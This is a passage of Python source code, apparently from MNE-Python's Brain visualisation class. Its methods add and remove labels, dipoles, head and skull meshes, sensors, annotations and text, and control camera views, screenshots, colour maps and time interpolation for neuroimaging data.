src[0]['src_mri_t']['trans'].copy() src_mri_t[:3] *= mult if resolution is not None: resolution = resolution * mult / 1000. # to mm del src, mult coords = np.array([c.ravel(order='F') for c in xyz]).T coords = apply_trans(src_mri_t, coords) self.geo[hemi] = Bunch(coords=coords) vertices = self._data[hemi]['vertices'] assert self._data[hemi]['array'].shape[0] == len(vertices) # MNE constructs the source space on a uniform grid in MRI space, # but mne coreg can change it to be non-uniform, so we need to # use all three elements here assert np.allclose( src_mri_t[:3, :3], np.diag(np.diag(src_mri_t)[:3])) spacing = np.diag(src_mri_t)[:3] origin = src_mri_t[:3, 3] - spacing / 2. scalars = np.zeros(np.prod(dimensions)) scalars[vertices] = 1. # for the outer mesh grid, grid_mesh, volume_pos, volume_neg = \ self._renderer._volume(dimensions, origin, spacing, scalars, surface_alpha, resolution, blending, center) self._data[hemi]['alpha'] = alpha # incorrectly set earlier self._data[hemi]['grid'] = grid self._data[hemi]['grid_mesh'] = grid_mesh self._data[hemi]['grid_coords'] = coords self._data[hemi]['grid_src_mri_t'] = src_mri_t self._data[hemi]['grid_shape'] = dimensions self._data[hemi]['grid_volume_pos'] = volume_pos self._data[hemi]['grid_volume_neg'] = volume_neg actor_pos, _ = self._renderer.plotter.add_actor( volume_pos, reset_camera=False, name=None, culling=False, render=False) actor_neg = actor_mesh = None if volume_neg is not None: actor_neg, _ = self._renderer.plotter.add_actor( volume_neg, reset_camera=False, name=None, culling=False, render=False) grid_mesh = self._data[hemi]['grid_mesh'] if grid_mesh is not None: actor_mesh, prop = self._renderer.plotter.add_actor( grid_mesh, reset_camera=False, name=None, culling=False, pickable=False, render=False) prop.SetColor(*self._brain_color[:3]) prop.SetOpacity(surface_alpha) if silhouette_alpha > 0 and silhouette_linewidth > 0: for _ in self._iter_views('vol'): self._renderer._silhouette( mesh=grid_mesh.GetInput(), color=self._brain_color[:3], line_width=silhouette_linewidth, alpha=silhouette_alpha, ) for actor in (actor_pos, actor_neg, actor_mesh): if actor is not None: _hide_testing_actor(actor) return actor_pos, actor_neg def add_label(self, label, color=None, alpha=1, scalar_thresh=None, borders=False, hemi=None, subdir=None, reset_camera=True): """Add an ROI label to the image. Parameters ---------- label : str | instance of Label Label filepath or name. Can also be an instance of an object with attributes "hemi", "vertices", "name", and optionally "color" and "values" (if scalar_thresh is not None). color : matplotlib-style color | None Anything matplotlib accepts: string, RGB, hex, etc. (default "crimson"). alpha : float in [0, 1] Alpha level to control opacity. scalar_thresh : None | float Threshold the label ids using this value in the label file's scalar field (i.e. label only vertices with scalar >= thresh). borders : bool | int Show only label borders. If int, specify the number of steps (away from the true border) along the cortical mesh to include as part of the border definition. hemi : str | None If None, it is assumed to belong to the hemipshere being shown. subdir : None | str If a label is specified as name, subdir can be used to indicate that the label file is in a sub-directory of the subject's label directory rather than in the label directory itself (e.g. for ``$SUBJECTS_DIR/$SUBJECT/label/aparc/lh.cuneus.label`` ``brain.add_label('cuneus', subdir='aparc')``). reset_camera : bool If True, reset the camera view after adding the label. Defaults to True. Notes ----- To remove previously added labels, run Brain.remove_labels(). """ from ...label import read_label if isinstance(label, str): if color is None: color = "crimson" if os.path.isfile(label): filepath = label label = read_label(filepath) hemi = label.hemi label_name = os.path.basename(filepath).split('.')[1] else: hemi = self._check_hemi(hemi) label_name = label label_fname = ".".join([hemi, label_name, 'label']) if subdir is None: filepath = op.join(self._subjects_dir, self._subject_id, 'label', label_fname) else: filepath = op.join(self._subjects_dir, self._subject_id, 'label', subdir, label_fname) if not os.path.exists(filepath): raise ValueError('Label file %s does not exist' % filepath) label = read_label(filepath) ids = label.vertices scalars = label.values else: # try to extract parameters from label instance try: hemi = label.hemi ids = label.vertices if label.name is None: label.name = 'unnamed' + str(self._unnamed_label_id) self._unnamed_label_id += 1 label_name = str(label.name) if color is None: if hasattr(label, 'color') and label.color is not None: color = label.color else: color = "crimson" if scalar_thresh is not None: scalars = label.values except Exception: raise ValueError('Label was not a filename (str), and could ' 'not be understood as a class. The class ' 'must have attributes "hemi", "vertices", ' '"name", and (if scalar_thresh is not None)' '"values"') hemi = self._check_hemi(hemi) if scalar_thresh is not None: ids = ids[scalars >= scalar_thresh] if self.time_viewer and self.show_traces \ and self.traces_mode == 'label': stc = self._data["stc"] src = self._data["src"] tc = stc.extract_label_time_course(label, src=src, mode=self.label_extract_mode) tc = tc[0] if tc.ndim == 2 else tc[0, 0, :] color = next(self.color_cycle) line = self.mpl_canvas.plot( self._data['time'], tc, label=label_name, color=color) else: line = None orig_color = color color = _to_rgb(color, alpha, alpha=True) cmap = np.array([(0, 0, 0, 0,), color]) ctable = np.round(cmap * 255).astype(np.uint8) scalars = np.zeros(self.geo[hemi].coords.shape[0]) scalars[ids] = 1 if borders: keep_idx = _mesh_borders(self.geo[hemi].faces, scalars) show = np.zeros(scalars.size, dtype=np.int64) if isinstance(borders, int): for _ in range(borders): keep_idx = np.in1d( self.geo[hemi].faces.ravel(), keep_idx) keep_idx.shape = self.geo[hemi].faces.shape keep_idx = self.geo[hemi].faces[np.any( keep_idx, axis=1)] keep_idx = np.unique(keep_idx) show[keep_idx] = 1 scalars *= show for _, _, v in self._iter_views(hemi): mesh = self._layered_meshes[hemi] mesh.add_overlay( scalars=scalars, colormap=ctable, rng=[np.min(scalars), np.max(scalars)], opacity=alpha, name=label_name, ) if reset_camera: self._renderer.set_camera(update=False, **views_dicts[hemi][v]) if self.time_viewer and self.show_traces \ and self.traces_mode == 'label': label._color = orig_color label._line = line self._labels[hemi].append(label) self._renderer._update() @fill_doc def add_forward(self, fwd, trans, alpha=1, scale=None): """Add a quiver to render positions of dipoles. Parameters ---------- %(fwd)s %(trans_not_none)s %(alpha)s Default 1. scale : None | float The size of the arrow representing the dipoles in :class:`mne.viz.Brain` units. Default 1.5mm. Notes ----- .. versionadded:: 1.0 """ head_mri_t = _get_trans(trans, 'head', 'mri', allow_none=False)[0] del trans if scale is None: scale = 1.5 if self._units == 'mm' else 1.5e-3 error_msg = ('Unexpected forward model coordinate frame ' '{}, must be "head" or "mri"') if fwd['coord_frame'] in _frame_to_str: fwd_frame = _frame_to_str[fwd['coord_frame']] if fwd_frame == 'mri': fwd_trans = Transform('mri', 'mri') elif fwd_frame == 'head': fwd_trans = head_mri_t else: raise RuntimeError(error_msg.format(fwd_frame)) else: raise RuntimeError(error_msg.format(fwd['coord_frame'])) for actor in _plot_forward( self._renderer, fwd, fwd_trans, fwd_scale=1e3 if self._units == 'mm' else 1, scale=scale, alpha=alpha): self._add_actor('forward', actor) self._renderer._update() def remove_forward(self): """Remove forward sources from the rendered scene.""" self._remove('forward', render=True) @fill_doc def add_dipole(self, dipole, trans, colors='red', alpha=1, scales=None): """Add a quiver to render positions of dipoles. Parameters ---------- dipole : instance of Dipole Dipole object containing position, orientation and amplitude of one or more dipoles or in the forward solution. %(trans_not_none)s colors : list | matplotlib-style color | None A single color or list of anything matplotlib accepts: string, RGB, hex, etc. Default red. %(alpha)s Default 1. scales : list | float | None The size of the arrow representing the dipole in :class:`mne.viz.Brain` units. Default 5mm. Notes ----- .. versionadded:: 1.0 """ head_mri_t = _get_trans(trans, 'head', 'mri', allow_none=False)[0] del trans n_dipoles = len(dipole) if not isinstance(colors, (list, tuple)): colors = [colors] * n_dipoles # make into list if len(colors) != n_dipoles: raise ValueError(f'The number of colors ({len(colors)}) ' f'and dipoles ({n_dipoles}) must match') colors = [_to_rgb(color, name=f'colors[{ci}]') for ci, color in enumerate(colors)] if scales is None: scales = 5 if self._units == 'mm' else 5e-3 if not isinstance(scales, (list, tuple)): scales = [scales] * n_dipoles # make into list if len(scales) != n_dipoles: raise ValueError(f'The number of scales ({len(scales)}) ' f'and dipoles ({n_dipoles}) must match') pos = apply_trans(head_mri_t, dipole.pos) pos *= 1e3 if self._units == 'mm' else 1 for _ in self._iter_views('vol'): for this_pos, this_ori, color, scale in zip( pos, dipole.ori, colors, scales): actor, _ = self._renderer.quiver3d( *this_pos, *this_ori, color=color, opacity=alpha, mode='arrow', scale=scale, scale_mode='scalar', scalars=[1]) self._add_actor('dipole', actor) self._renderer._update() def remove_dipole(self): """Remove dipole objects from the rendered scene.""" self._remove('dipole', render=True) @fill_doc def add_head(self, dense=True, color='gray', alpha=0.5): """Add a mesh to render the outer head surface. Parameters ---------- dense : bool Whether to plot the dense head (``seghead``) or the less dense head (``head``). %(color_matplotlib)s %(alpha)s Notes ----- .. versionadded:: 0.24 """ # load head surf = _get_head_surface('seghead' if dense else 'head', self._subject_id, self._subjects_dir) verts, triangles = surf['rr'], surf['tris'] verts *= 1e3 if self._units == 'mm' else 1 color = _to_rgb(color) for _ in self._iter_views('vol'): actor, _ = self._renderer.mesh( *verts.T, triangles=triangles, color=color, opacity=alpha, reset_camera=False, render=False) self._add_actor('head', actor) self._renderer._update() def remove_head(self): """Remove head objects from the rendered scene.""" self._remove('head', render=True) @fill_doc def add_skull(self, outer=True, color='gray', alpha=0.5): """Add a mesh to render the skull surface. Parameters ---------- outer : bool Adds the outer skull if ``True``, otherwise adds the inner skull. %(color_matplotlib)s %(alpha)s Notes ----- .. versionadded:: 0.24 """ surf = _get_skull_surface('outer' if outer else 'inner', self._subject_id, self._subjects_dir) verts, triangles = surf['rr'], surf['tris'] verts *= 1e3 if self._units == 'mm' else 1 color = _to_rgb(color) for _ in self._iter_views('vol'): actor, _ = self._renderer.mesh( *verts.T, triangles=triangles, color=color, opacity=alpha, reset_camera=False, render=False) self._add_actor('skull', actor) self._renderer._update() def remove_skull(self): """Remove skull objects from the rendered scene.""" self._remove('skull', render=True) @fill_doc def add_volume_labels(self, aseg='aparc+aseg', labels=None, colors=None, alpha=0.5, smooth=0.9, fill_hole_size=None, legend=None): """Add labels to the rendering from an anatomical segmentation. Parameters ---------- %(aseg)s labels : list Labeled regions of interest to plot. See :func:`mne.get_montage_volume_labels` for one way to determine regions of interest. Regions can also be chosen from the :term:`FreeSurfer LUT`. colors : list | matplotlib-style color | None A list of anything matplotlib accepts: string, RGB, hex, etc. (default :term:`FreeSurfer LUT` colors). %(alpha)s %(smooth)s fill_hole_size : int | None The size of holes to remove in the mesh in voxels. Default is None, no holes are removed. Warning, this dilates the boundaries of the surface by ``fill_hole_size`` number of voxels so use the minimal size. legend : bool | None | dict Add a legend displaying the names of the ``labels``. Default (None) is ``True`` if the number of ``labels`` is 10 or fewer. Can also be a dict of ``kwargs`` to pass to :meth:`pyvista.Plotter.add_legend`. Notes ----- .. versionadded:: 0.24 """ import nibabel as nib # load anatomical segmentation image if not aseg.endswith('aseg'): raise RuntimeError( f'`aseg` file path must end with "aseg", got {aseg}') aseg = _check_fname(op.join(self._subjects_dir, self._subject_id, 'mri', aseg + '.mgz'), overwrite='read', must_exist=True) aseg_fname = aseg aseg = nib.load(aseg_fname) aseg_data = np.asarray(aseg.dataobj) vox_mri_t = aseg.header.get_vox2ras_tkr() mult = 1e-3 if self._units == 'm' else 1 vox_mri_t[:3] *= mult del aseg # read freesurfer lookup table lut, fs_colors = read_freesurfer_lut() if labels is None: # assign default ROI labels based on indices lut_r = {v: k for k, v in lut.items()} labels = [lut_r[idx] for idx in DEFAULTS['volume_label_indices']] _validate_type(fill_hole_size, (int, None), 'fill_hole_size') _validate_type(legend, (bool, None), 'legend') if legend is None: legend = len(labels) < 11 if colors is None: colors = [fs_colors[label] / 255 for label in labels] elif not isinstance(colors, (list, tuple)): colors = [colors] * len(labels) # make into list colors = [_to_rgb(color, name=f'colors[{ci}]') for ci, color in enumerate(colors)] surfs = _marching_cubes( aseg_data, [lut[label] for label in labels], smooth=smooth, fill_hole_size=fill_hole_size) for label, color, (verts, triangles) in zip(labels, colors, surfs): if len(verts) == 0: # not in aseg vals warn(f'Value {lut[label]} not found for label ' f'{repr(label)} in: {aseg_fname}') continue verts = apply_trans(vox_mri_t, verts) for _ in self._iter_views('vol'): actor, _ = self._renderer.mesh( *verts.T, triangles=triangles, color=color, opacity=alpha, reset_camera=False, render=False) self._add_actor('volume_labels', actor) if legend or isinstance(legend, dict): # use empty kwargs for legend = True legend = legend if isinstance(legend, dict) else dict() self._renderer.plotter.add_legend( list(zip(labels, colors)), **legend) self._renderer._update() def remove_volume_labels(self): """Remove the volume labels from the rendered scene.""" self._remove('volume_labels', render=True) self._renderer.plotter.remove_legend() @fill_doc def add_foci(self, coords, coords_as_verts=False, map_surface=None, scale_factor=1, color="white", alpha=1, name=None, hemi=None, resolution=50): """Add spherical foci, possibly mapping to displayed surf. The foci spheres can be displayed at the coordinates given, or mapped through a surface geometry. In other words, coordinates from a volume-based analysis in MNI space can be displayed on an inflated average surface by finding the closest vertex on the white surface and mapping to that vertex on the inflated mesh. Parameters ---------- coords : ndarray, shape (n_coords, 3) Coordinates in stereotaxic space (default) or array of vertex ids (with ``coord_as_verts=True``). coords_as_verts : bool Whether the coords parameter should be interpreted as vertex ids. map_surface : str | None Surface to project the coordinates to, or None to use raw coords. When set to a surface, each foci is positioned at the closest vertex in the mesh. scale_factor : float Controls the size of the foci spheres (relative to 1cm). %(color_matplotlib)s %(alpha)s Default is 1. name : str Internal name to use. hemi : str | None If None, it is assumed to belong to the hemipshere being shown. If two hemispheres are being shown, an error will be thrown. resolution : int The resolution of the spheres. """ hemi = self._check_hemi(hemi, extras=['vol']) # Figure out how to interpret the first parameter if coords_as_verts: coords = self.geo[hemi].coords[coords] map_surface = None # Possibly map the foci coords through a surface if map_surface is not None: from scipy.spatial.distance import cdist foci_surf = _Surface(self._subject_id, hemi, map_surface, self._subjects_dir, offset=0, units=self._units, x_dir=self._rigid[0, :3]) foci_surf.load_geometry() foci_vtxs = np.argmin(cdist(foci_surf.coords, coords), axis=0) coords = self.geo[hemi].coords[foci_vtxs] # Convert the color code color = _to_rgb(color) if self._units == 'm': scale_factor = scale_factor / 1000. for _, _, v in self._iter_views(hemi): self._renderer.sphere(center=coords, color=color, scale=(10. * scale_factor), opacity=alpha, resolution=resolution) self._renderer.set_camera(**views_dicts[hemi][v]) # Store the foci in the Brain._data dictionary data_foci = coords if 'foci' in self._data.get(hemi, []): data_foci = np.vstack((self._data[hemi]['foci'], data_foci)) self._data[hemi] = self._data.get(hemi, dict()) # no data added yet self._data[hemi]['foci'] = data_foci @verbose def add_sensors(self, info, trans, meg=None, eeg='original', fnirs=True, ecog=True, seeg=True, dbs=True, verbose=None): """Add mesh objects to represent sensor positions. Parameters ---------- %(info_not_none)s %(trans_not_none)s %(meg)s %(eeg)s %(fnirs)s %(ecog)s %(seeg)s %(dbs)s %(verbose)s Notes ----- .. versionadded:: 0.24 """ _validate_type(info, Info, 'info') meg, eeg, fnirs, warn_meg = _handle_sensor_types(meg, eeg, fnirs) picks = pick_types(info, meg=('sensors' in meg), ref_meg=('ref' in meg), eeg=(len(eeg) > 0), ecog=ecog, seeg=seeg, dbs=dbs, fnirs=(len(fnirs) > 0)) head_mri_t = _get_trans(trans, 'head', 'mri', allow_none=False)[0] del trans # get transforms to "mri"window to_cf_t = _get_transforms_to_coord_frame( info, head_mri_t, coord_frame='mri') if pick_types(info, eeg=True, exclude=()).size > 0 and \ 'projected' in eeg: head_surf = _get_head_surface( 'seghead', self._subject_id, self._subjects_dir) else: head_surf = None # Do the main plotting for _ in self._iter_views('vol'): if picks.size > 0: sensors_actors = _plot_sensors( self._renderer, info, to_cf_t, picks, meg, eeg, fnirs, warn_meg, head_surf, self._units) for item, actors in sensors_actors.items(): for actor in actors: self._add_actor(item, actor) if 'helmet' in meg and pick_types(info, meg=True).size > 0: surf = get_meg_helmet_surf(info, head_mri_t) verts = surf['rr'] * (1 if self._units == 'm' else 1e3) actor, _ = self._renderer.mesh( *verts.T, surf['tris'], color=DEFAULTS['coreg']['helmet_color'], opacity=0.25, reset_camera=False, render=False) self._add_actor('helmet', actor) self._renderer._update() def remove_sensors(self, kind=None): """Remove sensors from the rendered scene. Parameters ---------- kind : str | list | None If None, removes all sensor-related data including the helmet. Can be "meg", "eeg", "fnirs", "ecog", "seeg", "dbs" or "helmet" to remove that item. """ all_kinds = ('meg', 'eeg', 'fnirs', 'ecog', 'seeg', 'dbs', 'helmet') if kind is None: for item in all_kinds: self._remove(item, render=False) else: if isinstance(kind, str): kind = [kind] for this_kind in kind: _check_option('kind', this_kind, all_kinds) self._remove(this_kind, render=False) self._renderer._update() def add_text(self, x, y, text, name=None, color=None, opacity=1.0, row=0, col=0, font_size=None, justification=None): """Add a text to the visualization. Parameters ---------- x : float X coordinate. y : float Y coordinate. text : str Text to add. name : str Name of the text (text label can be updated using update_text()). color : tuple Color of the text. Default is the foreground color set during initialization (default is black or white depending on the background color). opacity : float Opacity of the text (default 1.0). row : int | None Row index of which brain to use. Default is the top row. col : int | None Column index of which brain to use. Default is the left-most column. font_size : float | None The font size to use. justification : str | None The text justification. """ _validate_type(name, (str, None), 'name') name = text if name is None else name if 'text' in self._actors and name in self._actors['text']: raise ValueError(f'Text with the name {name} already exists') for ri, ci, _ in self._iter_views('vol'): if (row is None or row == ri) and (col is None or col == ci): actor = self._renderer.text2d( x_window=x, y_window=y, text=text, color=color, size=font_size, justification=justification) if 'text' not in self._actors: self._actors['text'] = dict() self._actors['text'][name] = actor def remove_text(self, name=None): """Remove text from the rendered scene. Parameters ---------- name : str | None Remove specific text by name. If None, all text will be removed. """ _validate_type(name, (str, None), 'name') if name is None: for actor in self._actors['text'].values(): self._renderer.plotter.remove_actor(actor) self._actors.pop('text') else: names = [None] if 'text' in self._actors: names += list(self._actors['text'].keys()) _check_option('name', name, names) self._renderer.plotter.remove_actor( self._actors['text'][name]) self._actors['text'].pop(name) self._renderer._update() def _configure_label_time_course(self): from ...label import read_labels_from_annot if not self.show_traces: return if self.mpl_canvas is None: self._configure_mplcanvas() else: self.clear_glyphs() self.traces_mode = 'label' self.add_annotation(self.annot, color="w", alpha=0.75) # now plot the time line self.plot_time_line(update=False) self.mpl_canvas.update_plot() for hemi in self._hemis: labels = read_labels_from_annot( subject=self._subject_id, parc=self.annot, hemi=hemi, subjects_dir=self._subjects_dir ) self._vertex_to_label_id[hemi] = np.full( self.geo[hemi].coords.shape[0], -1) self._annotation_labels[hemi] = labels for idx, label in enumerate(labels): self._vertex_to_label_id[hemi][label.vertices] = idx @fill_doc def add_annotation(self, annot, borders=True, alpha=1, hemi=None, remove_existing=True, color=None): """Add an annotation file. Parameters ---------- annot : str | tuple Either path to annotation file or annotation name. Alternatively, the annotation can be specified as a ``(labels, ctab)`` tuple per hemisphere, i.e. ``annot=(labels, ctab)`` for a single hemisphere or ``annot=((lh_labels, lh_ctab), (rh_labels, rh_ctab))`` for both hemispheres. ``labels`` and ``ctab`` should be arrays as returned by :func:`nibabel.freesurfer.io.read_annot`. borders : bool | int Show only label borders. If int, specify the number of steps (away from the true border) along the cortical mesh to include as part of the border definition. %(alpha)s Default is 1. hemi : str | None If None, it is assumed to belong to the hemipshere being shown. If two hemispheres are being shown, data must exist for both hemispheres. remove_existing : bool If True (default), remove old annotations. color : matplotlib-style color code If used, show all annotations in the same (specified) color. Probably useful only when showing annotation borders. """ from ...label import _read_annot hemis = self._check_hemis(hemi) # Figure out where the data is coming from if isinstance(annot, str): if os.path.isfile(annot): filepath = annot path = os.path.split(filepath)[0] file_hemi, annot = os.path.basename(filepath).split('.')[:2] if len(hemis) > 1: if annot[:2] == 'lh.': filepaths = [filepath, op.join(path, 'rh' + annot[2:])] elif annot[:2] == 'rh.': filepaths = [op.join(path, 'lh' + annot[2:], filepath)] else: raise RuntimeError('To add both hemispheres ' 'simultaneously, filename must ' 'begin with "lh." or "rh."') else: filepaths = [filepath] else: filepaths = [] for hemi in hemis: filepath = op.join(self._subjects_dir, self._subject_id, 'label', ".".join([hemi, annot, 'annot'])) if not os.path.exists(filepath): raise ValueError('Annotation file %s does not exist' % filepath) filepaths += [filepath] annots = [] for hemi, filepath in zip(hemis, filepaths): # Read in the data labels, cmap, _ = _read_annot(filepath) annots.append((labels, cmap)) else: annots = [annot] if len(hemis) == 1 else annot annot = 'annotation' for hemi, (labels, cmap) in zip(hemis, annots): # Maybe zero-out the non-border vertices self._to_borders(labels, hemi, borders) # Handle null labels properly cmap[:, 3] = 255 bgcolor = np.round(np.array(self._brain_color) * 255).astype(int) bgcolor[-1] = 0 cmap[cmap[:, 4] < 0, 4] += 2 ** 24 # wrap to positive cmap[cmap[:, 4] <= 0, :4] = bgcolor if np.any(labels == 0) and not np.any(cmap[:, -1] <= 0): cmap = np.vstack((cmap, np.concatenate([bgcolor, [0]]))) # Set label ids sensibly order = np.argsort(cmap[:, -1]) cmap = cmap[order] ids = np.searchsorted(cmap[:, -1], labels) cmap = cmap[:, :4] # Set the alpha level alpha_vec = cmap[:, 3] alpha_vec[alpha_vec > 0] = alpha * 255 # Override the cmap when a single color is used if color is not None: rgb = np.round(np.multiply(_to_rgb(color), 255)) cmap[:, :3] = rgb.astype(cmap.dtype) ctable = cmap.astype(np.float64) for _ in self._iter_views(hemi): mesh = self._layered_meshes[hemi] mesh.add_overlay( scalars=ids, colormap=ctable, rng=[np.min(ids), np.max(ids)], opacity=alpha, name=annot, ) self._annots[hemi].append(annot) if not self.time_viewer or self.traces_mode == 'vertex': self._renderer._set_colormap_range( mesh._actor, cmap.astype(np.uint8), None) self._renderer._update() def close(self): """Close all figures and cleanup data structure.""" self._closed = True self._renderer.close() def show(self): """Display the window.""" from ..backends._utils import _qt_app_exec self._renderer.show() if self._block: _qt_app_exec(self._renderer.figure.store["app"]) @fill_doc def show_view(self, view=None, roll=None, distance=None, *, row=None, col=None, hemi=None, align=True, azimuth=None, elevation=None, focalpoint=None): """Orient camera to display view. Parameters ---------- %(view)s %(roll)s %(distance)s row : int | None The row to set. Default all rows. col : int | None The column to set. Default all columns. hemi : str | None Which hemi to use for view lookup (when in "both" mode). align : bool If True, consider view arguments relative to canonical MRI directions (closest to MNI for the subject) rather than native MRI space. This helps when MRIs are not in standard orientation (e.g., have large rotations). %(azimuth)s %(elevation)s %(focalpoint)s Notes ----- The builtin string views are the following perspectives, based on the :term:`RAS` convention. If not otherwise noted, the view will have the top of the brain (superior, +Z) in 3D space shown upward in the 2D perspective: ``'lateral'`` From the left or right side such that the lateral (outside) surface of the given hemisphere is visible. ``'medial'`` From the left or right side such that the medial (inside) surface of the given hemisphere is visible (at least when in split or single-hemi mode). ``'rostral'`` From the front. ``'caudal'`` From the rear. ``'dorsal'`` From above, with the front of the brain pointing up. ``'ventral'`` From below, with the front of the brain pointing up. ``'frontal'`` From the front and slightly lateral, with the brain slightly tilted forward (yielding a view from slightly above). ``'parietal'`` From the rear and slightly lateral, with the brain slightly tilted backward (yielding a view from slightly above). ``'axial'`` From above with the brain pointing up (same as ``'dorsal'``). ``'sagittal'`` From the right side. ``'coronal'`` From the rear. Three letter abbreviations (e.g., ``'lat'``) of all of the above are also supported. """ _validate_type(row, ('int-like', None), 'row') _validate_type(col, ('int-like', None), 'col') hemi = self._hemi if hemi is None else hemi if hemi == 'split': if (self._view_layout == 'vertical' and col == 1 or self._view_layout == 'horizontal' and row == 1): hemi = 'rh' else: hemi = 'lh' _validate_type(view, (str, None), 'view') view_params = dict(azimuth=azimuth, elevation=elevation, roll=roll, distance=distance, focalpoint=focalpoint) if view is not None: # view_params take precedence view_params = {param: val for param, val in view_params.items() if val is not None} # no overwriting with None view_params = dict(views_dicts[hemi].get(view), **view_params) xfm = self._rigid if align else None for h in self._hemis: for ri, ci, _ in self._iter_views(h): if (row is None or row == ri) and (col is None or col == ci): self._renderer.set_camera( **view_params, reset_camera=False, rigid=xfm) self._renderer._update() def reset_view(self): """Reset the camera.""" for h in self._hemis: for _, _, v in self._iter_views(h): self._renderer.set_camera(**views_dicts[h][v], reset_camera=False) def save_image(self, filename=None, mode='rgb'): """Save view from all panels to disk. Parameters ---------- filename : str Path to new image file. mode : str Either 'rgb' or 'rgba' for values to return. """ if filename is None: filename = _generate_default_filename(".png") _save_ndarray_img( filename, self.screenshot(mode=mode, time_viewer=True)) @fill_doc def screenshot(self, mode='rgb', time_viewer=False): """Generate a screenshot of current view. Parameters ---------- mode : str Either 'rgb' or 'rgba' for values to return. %(brain_screenshot_time_viewer)s Returns ------- screenshot : array Image pixel values. """ n_channels = 3 if mode == 'rgb' else 4 img = self._renderer.screenshot(mode) logger.debug(f'Got screenshot of size {img.shape}') if time_viewer and self.time_viewer and \ self.show_traces and \ not self.separate_canvas: from matplotlib.image import imread canvas = self.mpl_canvas.fig.canvas canvas.draw_idle() fig = self.mpl_canvas.fig with BytesIO() as output: # Need to pass dpi here so it uses the physical (HiDPI) DPI # rather than logical DPI when saving in most cases. # But when matplotlib uses HiDPI and VTK doesn't # (e.g., macOS w/Qt 5.14+ and VTK9) then things won't work, # so let's just calculate the DPI we need to get # the correct size output based on the widths being equal size_in = fig.get_size_inches() dpi = fig.get_dpi() want_size = tuple(x * dpi for x in size_in) n_pix = want_size[0] * want_size[1] logger.debug( f'Saving figure of size {size_in} @ {dpi} DPI ' f'({want_size} = {n_pix} pixels)') # Sometimes there can be off-by-one errors here (e.g., # if in mpl int() rather than int(round()) is used to # compute the number of pixels) so rather than use "raw" # format and try to reshape ourselves, just write to PNG # and read it, which has the dimensions encoded for us. fig.savefig(output, dpi=dpi, format='png', facecolor=self._bg_color, edgecolor='none') output.seek(0) trace_img = imread(output, format='png')[:, :, :n_channels] trace_img = np.clip( np.round(trace_img * 255), 0, 255).astype(np.uint8) bgcolor = np.array(self._brain_color[:n_channels]) / 255 img = concatenate_images([img, trace_img], bgcolor=bgcolor, n_channels=n_channels) return img @contextlib.contextmanager def _no_lut_update(self, why): orig = self._lut_locked self._lut_locked = why try: yield finally: self._lut_locked = orig @fill_doc def update_lut(self, fmin=None, fmid=None, fmax=None, alpha=None): """Update color map. Parameters ---------- %(fmin_fmid_fmax)s %(alpha)s """ args = f'{fmin}, {fmid}, {fmax}, {alpha}' if self._lut_locked is not None: logger.debug(f'LUT update postponed with {args}') return logger.debug(f'Updating LUT with {args}') center = self._data['center'] colormap = self._data['colormap'] transparent = self._data['transparent'] lims = {key: self._data[key] for key in ('fmin', 'fmid', 'fmax')} _update_monotonic(lims, fmin=fmin, fmid=fmid, fmax=fmax) assert all(val is not None for val in lims.values()) self._data.update(lims) self._data['ctable'] = np.round( calculate_lut(colormap, alpha=1., center=center, transparent=transparent, **lims) * 255).astype(np.uint8) # update our values rng = self._cmap_range ctable = self._data['ctable'] for hemi in ['lh', 'rh', 'vol']: hemi_data = self._data.get(hemi) if hemi_data is not None: if hemi in self._layered_meshes: mesh = self._layered_meshes[hemi] mesh.update_overlay(name='data', colormap=self._data['ctable'], opacity=alpha, rng=rng) self._renderer._set_colormap_range( mesh._actor, ctable, self._scalar_bar, rng, self._brain_color) grid_volume_pos = hemi_data.get('grid_volume_pos') grid_volume_neg = hemi_data.get('grid_volume_neg') for grid_volume in (grid_volume_pos, grid_volume_neg): if grid_volume is not None: self._renderer._set_volume_range( grid_volume, ctable, hemi_data['alpha'], self._scalar_bar, rng) glyph_actor = hemi_data.get('glyph_actor') if glyph_actor is not None: for glyph_actor_ in glyph_actor: self._renderer._set_colormap_range( glyph_actor_, ctable, self._scalar_bar, rng) if self.time_viewer: with self._no_lut_update(f'update_lut {args}'): for key in ('fmin', 'fmid', 'fmax'): self.callbacks[key](lims[key]) self._renderer._update() def set_data_smoothing(self, n_steps): """Set the number of smoothing steps. Parameters ---------- n_steps : int Number of smoothing steps. """ from ...morph import _hemi_morph for hemi in ['lh', 'rh']: hemi_data = self._data.get(hemi) if hemi_data is not None: if len(hemi_data['array']) >= self.geo[hemi].x.shape[0]: continue vertices = hemi_data['vertices'] if vertices is None: raise ValueError( 'len(data) < nvtx (%s < %s): the vertices ' 'parameter must not be None' % (len(hemi_data), self.geo[hemi].x.shape[0])) morph_n_steps = 'nearest' if n_steps == -1 else n_steps with use_log_level(False): smooth_mat = _hemi_morph( self.geo[hemi].orig_faces, np.arange(len(self.geo[hemi].coords)), vertices, morph_n_steps, maps=None, warn=False) self._data[hemi]['smooth_mat'] = smooth_mat self.set_time_point(self._data['time_idx']) self._data['smoothing_steps'] = n_steps @property def _n_times(self): return len(self._times) if self._times is not None else None @property def time_interpolation(self): """The interpolation mode.""" return self._time_interpolation @fill_doc def set_time_interpolation(self, interpolation): """Set the interpolation mode. Parameters ---------- %(brain_time_interpolation)s """ self._time_interpolation = _check_option( 'interpolation', interpolation, ('linear', 'nearest', 'zero', 'slinear', 'quadratic', 'cubic') ) self._time_interp_funcs = dict() self._time_interp_inv = None if self._times is not None: idx = np.arange(self._n_times) for hemi in ['lh', 'rh', 'vol']: hemi_data = self._data.get(hemi) if hemi_data is not None: array = hemi_data['array'] self._time_interp_funcs[hemi] = _safe_interp1d( idx, array, self._time_interpolation, axis=-1, assume_sorted=True) self._time_interp_inv = _safe_interp1d(idx, self._times) def set_time_point(self, time_idx): """Set the time point shown (can be a float to interpolate). Parameters ---------- time_idx : int | float The time index to use. Can be a float to use interpolation between indices. """ self._current_act_data = dict() time_actor = self._data.get('time_actor', None) time_label = self._data.get('time_label', None) for hemi in ['lh', 'rh', 'vol']: hemi_data = self._data.get(hemi) if hemi_data is not None: array = hemi_data['array'] # interpolate in time vectors = None if array.ndim == 1: act_data = array self._current_time = 0 else: act_data = self._time_interp_funcs[hemi](time_idx) self._current_time = self._time_interp_inv(time_idx) if array.ndim == 3: vectors = act_data act_data = np.linalg.norm(act_data, axis=1) self._current_time = self._time_interp_inv(time_idx) self._current_act_data[hemi] = act_data if time_actor is not None and time_label is not None: time_actor.SetInput(time_label(self._current_time)) # update the volume interpolation grid = hemi_data.get('grid') if grid is not None: vertices = self._data['vol']['vertices'] values = self._current_act_data['vol'] rng = self._cmap_range fill = 0 if self._data['center'] is not None else rng[0] 